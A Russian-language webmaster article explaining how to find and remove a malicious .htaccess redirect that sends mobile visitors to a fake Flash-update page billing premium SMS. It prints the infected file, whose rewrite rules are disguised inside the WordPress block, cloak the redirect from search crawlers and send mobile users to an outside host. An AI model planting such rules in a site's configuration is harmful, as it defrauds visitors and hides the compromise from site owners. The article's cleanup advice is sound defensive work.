Как удалить вирус редирект с сайта для мобильного устройства

23.08.2012 Распечатать

В последнее время стали распространены вирусы (скрипты), которые производят редирект (загрузку) на другой сайт с мобильных устройств: телефонов, планшетов, коммуникаторов, работающих на различных мобильных платформах:  Android, Symbian, Windows mobile, Ios, Blackberry и прочие.

Иными словами при заходе на сайт с компьютера, сайт отображается корректно. А при заходе с мобильного телефона — подгружается сторонний сайт, с требованием обновить что-либо, скачать, установить, сделать upgrade.

В этом случае на вашем сайте поселился вирус, который производит 302 редирект (redirect) с целью загрузки Вами приложения, запуска его и отправки смс на короткий номер — где с Вас спишут кругленькую сумму.

Рассмотрим пример такого вируса и метод его удаления:

Как ни странно, приведенный ниже вредоносный код на данный момент (23.08.2012) не замечает ни один сервис для определения вирусов на сайте, а также Яндекс.Вебмастер и инструменты Google для вебмастеров.

1) В данном случае можно заметить что при заходе на свой сайт — site.ru, произошел редирект на сторонний сайт — pdacontent.ru о чем свидетельствует адрес в адресной строке

2) Пиратский ресурс выдает себя за обновление Flash-плеера  и приводит примечание, дабы мы согласились скачать себе файл: «Примечание. Для того, чтобы обновить Flash-плеер для телефона, вам нужно перейти по ссылке и сохранить установочный файл себе на телефон.»

3) Понять о том, что это вирус можно также по неработающим ссылкам Другие наши продукты.

4) Также, если нажать на самую нижнюю запись Пользовательское соглашение, то можно увидеть почти легальные расценки на смс-сообщения, которые будут отправлены с вашего мобильного устройства чтобы якобы обновить flash-плеер.

Теперь рассмотрим, где же находится вирус и как с ним бороться.

Данный вирус оказался вовсе не на мобильном телефоне и вовсе не в флеш-плеере.  Скрипт находился на сайте. Были проверены основные файлы php и javascript, но там файл был не обнаружен. Хотя вредоносный код  можно встроить на выполнение в любой из исполняемых скриптов. Данный код может производить загрузки других сайтов, которые могут навязывать не только обновление flash-плеера, но и другие аналогичные действия. 

В итоге зараженным оказался служебный файл веб-сервера Apache, предназначенный для децентрализованного управления конфигурацией сервера — .htaccess

Ниже приводится листинг этого файла и сам вредоносный код:

# BEGIN WordPress
 
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://systemaz.ru/?8&source=site.ru [L,R=302] #/?8&source=site.ru [L,R=302] # On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
 
# END WordPress

Лечение — замена файла на оригинальный без вредоносного кода/удаление вредоносного кода.

Попасть вредоносный код в файл мог при краже доступа к ftp серверу или панели управления хостингом.

Мы рекомендуем сменить все пароли к хостингу и проверить компьютер антивирусом.